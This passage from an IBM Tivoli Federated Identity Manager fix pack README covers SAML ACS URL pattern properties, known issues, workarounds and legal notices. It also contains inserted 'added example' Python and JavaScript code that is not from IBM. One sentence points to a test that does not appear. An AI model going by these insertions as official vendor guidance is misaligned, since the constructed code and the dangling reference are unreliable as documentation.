The custom runtime property SAML20.IDP.ACSUrlPattern_<fedId>_<partnerId>_<binding> takes precedence over SAML20.IDP.ACSUrlPattern_<fedId>_<partnerId>. This means that if both custom runtime properties are used, Tivoli Federated Identity Manager first uses the regex pattern of the property whose <binding> value matches the binding in use.
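The lookup and validation described above, as an added example written for this README and not IBM code: it resolves the binding-specific key before the federation/partner key, falls back to the default exact string comparison when neither is set, and matches the whole URL with re.fullmatch because the README does not say whether the pattern is anchored and an unanchored search would accept any URL that merely embeds the configured one. The property values are constructed: the two patterns differ so that the precedence is observable, the dots are escaped (the README's sample leaves them unescaped, where `.` matches any character), and the regex is stored as the engine must see it, the README's `\\?` being assumed to be the same pattern with property-file backslash escaping.

```python
import re

HTTP_POST = "urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST"
HTTP_ARTIFACT = "urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Artifact"

FED_ID = "https://ip.example.com/sps/saml20ip/saml20"
PARTNER_ID = "https://sp.example.com/sps/saml20sp/saml20"
CONFIGURED_ACS = "https://sp.example.com/sps/saml20sp/saml20"   # the partner's configured ACS URL

# Constructed sample properties (assumptions, not a real configuration). The binding-specific
# pattern requires a /post path so that its precedence over the generic pattern is visible.
PROPERTIES = {
    f"SAML20.IDP.ACSUrlPattern_{FED_ID}_{PARTNER_ID}":
        r"https://sp\.example\.com/sps/saml20sp/saml20(\?(\S+?)=(\S+?))?",
    f"SAML20.IDP.ACSUrlPattern_{FED_ID}_{PARTNER_ID}_{HTTP_POST}":
        r"https://sp\.example\.com/sps/saml20sp/saml20/post(\?(\S+?)=(\S+?))?",
}


def acs_pattern(props, fed_id, partner_id, binding):
    """Return (regex, key) honouring the README's precedence: the key with the binding
    suffix wins over the fed/partner key. Returns (None, None) if neither is configured."""
    for key in (f"SAML20.IDP.ACSUrlPattern_{fed_id}_{partner_id}_{binding}",
                f"SAML20.IDP.ACSUrlPattern_{fed_id}_{partner_id}"):
        if key in props:
            return props[key], key
    return None, None


def validate_acs_url(props, fed_id, partner_id, binding, acs_url, configured_acs):
    """Decide whether the AuthnRequest's AssertionConsumerServiceURL is acceptable.

    Returns (accepted, rule): rule is the property key that decided, or "exact" for the
    default exact string comparison. The whole URL must match the pattern; re.search would
    also accept a URL that only contains the configured one somewhere inside it.
    """
    pattern, key = acs_pattern(props, fed_id, partner_id, binding)
    if pattern is None:
        return acs_url == configured_acs, "exact"
    return re.fullmatch(pattern, acs_url) is not None, key
```

The last assertion in the test below is the one worth keeping in mind when writing these patterns: whatever the pattern allows is where the IdP will post assertions, so it should never be looser than the set of ACS endpoints the partner actually operates.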
Back to Contents
STSUUSER PRINCIPAL DOES NOT MATCH INCOMING ASSERTION NAMEID (IV21963)
- Symptom
- The STSUUSER principal name does not match the
incoming Subject Name ID of the assertion.
- Cause
- When a user signs on in an existing authenticated
session, and the username in the incoming Subject Name ID of the SAML
2.0 assertion does not match the existing user session, the token
created as a result of the single sign-on is still associated with
the existing user session.
- NOTE: This issue is only applicable to single sign-on sessions using the email Name ID format.
- Resolving the problem
- The fix modifies the behavior of the token
issuance. The default behavior is to use the incoming Subject Name ID
of the assertion as the principal name. This behavior happens if the
existing session username does not match the Subject Name ID of the
assertion.
- To set the validation to use the existing session
principal name instead of the incoming Subject Name ID of the
assertion, set the SAML20.SP.IV20677.Enabled
custom runtime property to false.
Back to Contents
Installation
The risk-based access package (pak) file cannot be installed simultaneously with the other pak files.
Custom Authentication Callback Modules
The TFIM authentication service uses the HTTP session to store the state necessary to perform an authentication event. This state includes the authentication callbacks that have not finished the flow. If the callbacks include a custom authentication callback module that requires user input, a ClassDefNotFound error will be generated if the session is serialized.
Back to Contents
Possible duplicate RBA device registrations with caching of authorization decisions.
Issue:
If caching of authorization decisions by the authorization service of the runtime security services is enabled and a consent-based device registration policy is configured, the same browser device can be registered multiple times when a user accesses the same RBA-protected page more than once within the maximum time period for which an authorization decision is cached.
Workaround:
Disable caching of authorization decisions by authorization service of the runtime security services. See the
Security Policy Manager documentation for more
details.
Incorrect version shows in the Tivoli Federated Identity
Manager Runtime Node Management panel
Issue:
After uninstalling the fix pack, the user can deploy
the base version of Tivoli® Federated Identity Manager from the Runtime
Node Management panel.
After deploying the runtime, the Runtime Management
panel shows the correct version of Tivoli Federated Identity Manager.
However, the Runtime Nodes panel shows an incorrect
Runtime version.
Workaround:
- Select Tivoli Federated Identity Manager > Domains > Domain Properties > Domain Information.
- Click Refresh Management Service.
- Select Tivoli Federated Identity Manager > Domain Management > Runtime Node Management.
- Click Publish Plug-ins.
- Click Load configuration changes to Tivoli Federated Identity Manager runtime from the Integrated Solutions Console.
- Log off from the Integrated Solutions Console.
- Log on again.
- Select Tivoli Federated Identity Manager > Domain Management > Runtime Node Management.
The correct Tivoli Federated Identity Manager
runtime version now shows in the Runtime Management and Runtime Nodes
panels.
See the Tivoli Federated Identity Manager documentation for more
details.
User Self Care STS chains are not automatically upgraded after applying the fix pack
Issue:
If you modified your STS chains before using the multiple secret question feature, you might need to modify your STS chains manually.
There are three chains affected by the
multiple secret question feature:
- Default Chain uscCreateAccount
- Default Chain uscForgottenPassword
- Default Chain uscProfileManagement
Workaround:
- Log in to Integrated Solutions Console.
- Navigate to > Configure Trust Service > Module Instance.
- Check whether Default USC Secret Question Store Module is in the list of module instances. If it appears, continue to step 5. Otherwise proceed to the next step.
- Add the module instance manually:
- Click Create.
- In module type select com.tivoli.am.fim.trustserver.sts.modules.USCSecretQuestionStoreSTSModule.
- Click Next.
- Fill in the module instance name with Default
USC Secret Question Store Module and module description
with Default USC Secret Question Store Module.
- Click Finish.
- Change the value of the
runtime custom property STS.showUSCChains:
- Navigate to .
- Click Runtime Custom Properties.
- Change the value of the parameter STS.showUSCChains to true.
- Click OK.
- Click Load configuration changes to the Tivoli
Federated Identity Manager runtime.
- Log out and log in to Integrated Solutions Console.
- Navigate to .
- Select the chain you want to check.
- Click Properties
- Check the three chains and verify if they need to be fixed
manually.
- Default Chain uscCreateAccount - The USC Secret Question Store
Module (validate mode) must be added after Default USC Account Create
Module (validate mode).
- Default Chain uscProfileManagement - The USC Secret Question Store
Module (validate mode) must be added after Default USC Profile Management
Module (validate mode).
- Default Chain uscForgottenPassword - The USC Secret Question Module
(validate mode) must be added after Default USC Account Recovery Module
(validate mode). The USC Secret Question Module (issue mode) must
be added after Default USC VMM Entity Module (map mode).
If the STS chains are not successfully upgraded, you need to modify the chains manually.
- Navigate to .
- Select the chain you want to modify.
- Click Modify Chain.
- Click Continue with Modification.
- Modify the corresponding chains so that they appear as provided in the bulleted list.
- Click Load configuration changes to the Tivoli Federated Identity Manager runtime.
Patch installation fails when Federal Information Processing Standard (FIPS) is enabled for WebSphere Application Server
Issue:
Patch installation fails when FIPS is enabled for the WebSphere Application Server where Tivoli Federated Identity Manager is deployed.
Workaround:
Before installing the patch, disable FIPS for the WebSphere Application Server where Tivoli Federated Identity Manager is deployed.
Import of Javascript mapping rule fails when the mapping rule throws an exception during validation
Issue:
Problem
When you use the Tivoli®
Federated Identity Manager console or command line to import a
JavaScript mapping rule, an empty Security Token Service Universal User
(STSUU) is used as an input to validate the JavaScript.
Symptom
Validating the JavaScript using an empty STSUU input can cause problems. Problems occur when the JavaScript rule throws exceptions in cases that do not occur in the real federation runtime flow, but do occur when the empty STSUU is passed to the rule during validation.
Cause
If the JavaScript mapping rule throws an exception during validation, the Tivoli Federated Identity Manager console rejects it as bad syntax and does not load it.
Diagnosing the problem
When you use the Tivoli
Federated Identity Manager console or command line to import a
JavaScript mapping rule, the software runs basic JavaScript validation.
The JavaScript validation process prevents the upload of a mapping rule
with an invalid syntax.
Tivoli Federated
Identity Manager validates the JavaScript mapping rule with the
JavaScript engine, which executes the mapping rule. JavaScript mapping
rules have three context variables which can be accessed by name. The
names correspond to Java objects, which are elements of a WS-Trust
request. The names are also available in the STSModule interface seen by
pure Java mapping rule developers. The three context variables, which
come from the invoke method of the STSModule interface, are:
- stsuu – The Java STSUniversalUser object returned from STSResponse.getSTSUniversalUser().
- stsrequest – The Java STSRequest object from the invoke method.
- stsresponse – The STSResponse object from the invoke method.
When you run the JavaScript mapping rule at run
time, the context variables are populated with real data based on the
following factors:
- The request made to the Security Token Service
(STS).
- Any other STS modules that were executed in the
chain before your mapping module.
When the Tivoli Federated
Identity Manager console or command line validates the mapping rule, no
real request exists. The variables are then populated with empty
objects.
Your mapping rule might use conditional statements. The
conditional statements make sense during real runtime operations, but do
not work properly when empty objects are passed to it during validation.
The following sample JavaScript mapping rule
illustrates the problem:
importPackage(Packages.com.tivoli.am.fim.trustserver.sts);
importPackage(Packages.com.tivoli.am.fim.trustserver.sts.uuser);
importPackage(Packages.com.tivoli.am.fim.trustserver.sts.utilities);
// Throw an STS exception if the STSUU does not contain an attribute I am expecting.
// During console validation the STSUU is empty, so this branch is always taken
// and the rule is rejected as bad syntax.
var attrvalue = stsuu.getAttributeValueByName("myattr");
if (attrvalue == null) {
IDMappingExtUtils.throwSTSException('missing attribute');
}
Workaround:
As a workaround, write the JavaScript rule so that it is aware of empty
objects and does not throw an exception when it detects an empty STSUU.
Build detection of the validation sequence into the rule itself, so that
the rule does not terminate with an exception when it is operating on
empty objects.
The detection code varies depending on the assumptions
you can make about request objects in your runtime flow. For example, an
STSUU typically contains one or more attributes in the Principal,
AttributeList, or ContextAttributes sections of the STSUU. If it does not
contain any attributes in any of these sections, it is an empty STSUU.
To skip further rule execution using the
workaround, author your JavaScript mapping rule using the following
pattern:
importPackage(Packages.com.tivoli.am.fim.trustserver.sts);
importPackage(Packages.com.tivoli.am.fim.trustserver.sts.uuser);
importPackage(Packages.com.tivoli.am.fim.trustserver.sts.utilities);
// All three attribute containers are empty only when the console or the
// command line is validating the rule; a real request populates at least one.
var isEmptySTSUU = (
(stsuu.getPrincipalAttributeContainer().getNumberOfAttributes() == 0) &&
(stsuu.getAttributeContainer().getNumberOfAttributes() == 0) &&
(stsuu.getContextAttributesAttributeContainer().getNumberOfAttributes() == 0));
if (!isEmptySTSUU) {
// rest of your normal runtime mapping rule logic goes here
.......
}
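The following is an added example, not code from the fix pack or from IBM. It takes the README's empty-STSUU detection and the "missing attribute" rule above and exercises them against constructed stand-ins for the STSUU object, so that all three situations can be checked side by side: the validation pass (empty STSUU, rule must not throw), a runtime request that carries the expected attribute, and a runtime request that lacks it (rule must still fail closed). The stand-in objects only imitate the method names the README uses (getPrincipalAttributeContainer, getAttributeContainer, getContextAttributesAttributeContainer, getNumberOfAttributes, getAttributeValueByName) and are an assumption of this example; the real rule runs inside the product's JavaScript engine with the importPackage lines shown above, and throwSTSException here stands in for IDMappingExtUtils.throwSTSException.

```javascript
// Added example, not IBM code. Written in ES5 style (var, function) so the
// rule body matches the syntax the README's own samples use.

// Constructed stand-in for an STSUU: three attribute maps behind the same
// method names the README's detection pattern calls.
function makeStsuu(principal, attributes, context) {
  function container(map) {
    return {
      getNumberOfAttributes: function () { return Object.keys(map).length; }
    };
  }
  return {
    getPrincipalAttributeContainer: function () { return container(principal); },
    getAttributeContainer: function () { return container(attributes); },
    getContextAttributesAttributeContainer: function () { return container(context); },
    // Assumed to behave like the product method: null when the attribute is absent.
    getAttributeValueByName: function (name) {
      return Object.prototype.hasOwnProperty.call(attributes, name) ? attributes[name] : null;
    }
  };
}

// Stand-in for IDMappingExtUtils.throwSTSException: the STS turns this into
// a fault, which is what a genuine runtime failure should produce.
function throwSTSException(message) {
  throw new Error("STSException: " + message);
}

// The README's detection: all three containers empty means the console or
// command line is validating the rule rather than serving a request.
function isEmptySTSUU(stsuu) {
  return (
    stsuu.getPrincipalAttributeContainer().getNumberOfAttributes() === 0 &&
    stsuu.getAttributeContainer().getNumberOfAttributes() === 0 &&
    stsuu.getContextAttributesAttributeContainer().getNumberOfAttributes() === 0
  );
}

// The empty-object-aware rule. It returns a status string so the outcome can
// be inspected; a real rule would modify the stsuu in place instead.
function mappingRule(stsuu) {
  if (isEmptySTSUU(stsuu)) {
    // Validation pass: nothing to map, and throwing here would block the upload.
    return "skipped-validation";
  }
  // Normal runtime logic: the attribute is required, so fail closed without it.
  var attrvalue = stsuu.getAttributeValueByName("myattr");
  if (attrvalue === null) {
    throwSTSException("missing attribute");
  }
  return "mapped:" + attrvalue;
}

// Runs the rule and reports either its result or the exception it raised.
function runScenario(stsuu) {
  try {
    return mappingRule(stsuu);
  } catch (e) {
    return "error:" + e.message;
  }
}

// Three constructed scenarios (sample data made up for this example).
var validationStsuu = makeStsuu({}, {}, {});
var runtimeWithAttr = makeStsuu({ name: "alice" }, { myattr: "value1" }, {});
var runtimeMissingAttr = makeStsuu({ name: "alice" }, {}, { authmethod: "password" });

if (typeof require !== "undefined" && require.main === module) {
  console.log("validation:", runScenario(validationStsuu));
  console.log("runtime ok:", runScenario(runtimeWithAttr));
  console.log("runtime missing:", runScenario(runtimeMissingAttr));
}
```

The guard only silences the exception when every container is empty, so a runtime request that genuinely lacks the attribute still produces the STS fault. The trade-off is that a runtime request whose STSUU is entirely empty would also be treated as a validation pass and mapped to nothing; if your flow can produce such requests, tighten the detection to whatever the README calls your runtime assumptions (for example, require a Principal attribute that every real request carries).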
Auditing for RBA is not happening even though it is configured.
Issue:
Auditing for RBA is not happening even though it is configured.
Workaround:
- Create a dummy property file
WAS_PROFILE_DIR/config/itfim/rba/rba.properties if it does not exist, or
- Use the manageRbaConfiguration command to set a property with a name that begins with "db".
Notices
This information was developed for products and services offered
in the U.S.A. IBM may not offer the products, services, or features
discussed in this document in other countries. Consult your local IBM
representative for information on the products and services currently
available in your area. Any reference to an IBM product, program, or
service is not intended to state or imply that only that IBM product,
program, or service may be used. Any functionally equivalent product,
program, or service that does not infringe any IBM intellectual property
right may be used instead. However, it is the user's responsibility to
evaluate and verify the operation of any non-IBM product, program, or
service.
IBM may have patents or pending patent applications covering
subject matter described in this document. The furnishing of this
document does not give you any license to these patents. You can send
license inquiries, in writing, to:
IBM Director of Licensing
IBM Corporation
North Castle Drive
Armonk, NY 10504-1785
U.S.A.
For license inquiries regarding double-byte (DBCS) information,
contact the IBM Intellectual Property Department in your country or send
inquiries, in writing, to:
Intellectual Property Licensing
Legal and Intellectual Property Law
IBM Japan, Ltd.
1623-14, Shimotsuruma, Yamato-shi
Kanagawa 242-8502 Japan
The following paragraph does not apply to the United Kingdom or
any other country where such provisions are inconsistent with local law:
INTERNATIONAL BUSINESS MACHINES CORPORATION PROVIDES THIS
PUBLICATION "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR
IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
NON-INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.
Some states do not allow disclaimer of express or implied
warranties in certain transactions, therefore, this statement might not
apply to you.
This information could include technical inaccuracies or
typographical errors. Changes are periodically made to the information
herein; these changes will be incorporated in new editions of the
publication. IBM may make improvements and/or changes in the product(s)
and/or the program(s) described in this publication at any time without
notice.
Any references in this information to non-IBM Web sites are
provided for convenience only and do not in any manner serve as an
endorsement of those Web sites. The materials at those Web sites are not
part of the materials for this IBM product and use of those Web sites is
at your own risk.
IBM may use or distribute any of the information you supply in
any way it believes appropriate without incurring any obligation to you.
Licensees of this program who wish to have information about it
for the purpose of enabling: (i) the exchange of information between
independently created programs and other programs (including this one)
and (ii) the mutual use of the information that has been exchanged,
should contact:
IBM Corporation
2Z4A/101
11400 Burnet Road
Austin, TX 78758
U.S.A.
Such information may be available, subject to appropriate terms
and conditions, including in some cases, payment of a fee.
The licensed program described in this document and all licensed
material available for it are provided by IBM under terms of the IBM
Customer Agreement, IBM International Program License Agreement or any
equivalent agreement between us.
Any performance data contained herein was determined in a
controlled environment. Therefore, the results obtained in other
operating environments may vary significantly. Some measurements may
have been made on development-level systems and there is no guarantee
that these measurements will be the same on generally available systems.
Furthermore, some measurements may have been estimated through
extrapolation. Actual results may vary. Users of this document should
verify the applicable data for their specific environment.
Information concerning non-IBM products was obtained from the
suppliers of those products, their published announcements or other
publicly available sources. IBM has not tested those products and cannot
confirm the accuracy of performance, compatibility or any other claims
related to non-IBM products. Questions on the capabilities of non-IBM
products should be addressed to the suppliers of those products.
All statements regarding IBM's future direction or intent are
subject to change or withdrawal without notice, and represent goals and
objectives only.
This information contains examples of data and reports used in
daily business operations. To illustrate them as completely as possible,
the examples include the names of individuals, companies, brands, and
products. All of these names are fictitious and any similarity to the
names and addresses used by an actual business enterprise is entirely
coincidental.
IBM, the IBM logo, and ibm.com® are trademarks or registered
trademarks of International Business Machines Corp., registered in many
jurisdictions worldwide. Other product and service names might be
trademarks of IBM or other companies. A current list of IBM trademarks
is available on the Web at “Copyright and trademark
information” at www.ibm.com/legal/copytrade.shtml.
Adobe®, Acrobat, PostScript® and all Adobe-based trademarks are
either registered trademarks or trademarks of Adobe Systems Incorporated
in the United States, other countries, or both.
IT Infrastructure Library® is a registered trademark of the
Central Computer and Telecommunications Agency which is now part of the
Office of Government Commerce.
Intel®, Intel logo, Intel Inside®, Intel Inside logo, Intel
Centrino®, Intel Centrino logo, Celeron®, Intel Xeon®, Intel SpeedStep®,
Itanium®, and Pentium® are trademarks or registered trademarks of Intel
Corporation or its subsidiaries in the United States and other
countries.
Linux® is a trademark of Linus Torvalds in the United States,
other countries, or both.
Microsoft, Windows, Windows NT®, and the Windows logo are
trademarks of Microsoft Corporation in the United States, other
countries, or both.
ITIL® is a registered trademark, and a registered community
trademark of the Office of Government Commerce, and is registered in the
U.S. Patent and Trademark Office.
UNIX® is a registered trademark of The Open Group in the United
States and other countries.
Cell Broadband Engine™ and Cell/B.E. are trademarks of Sony
Computer Entertainment, Inc., in the United States, other countries, or
both and are used under license therefrom.
Java and all Java-based trademarks and logos are trademarks or
registered trademarks of Oracle and/or its affiliates.
Other company, product, and service names may be trademarks or
service marks of others.
End of the IBM® Tivoli® Federated Identity Manager
6.2.2-TIV-TFIM-FP0018.README file.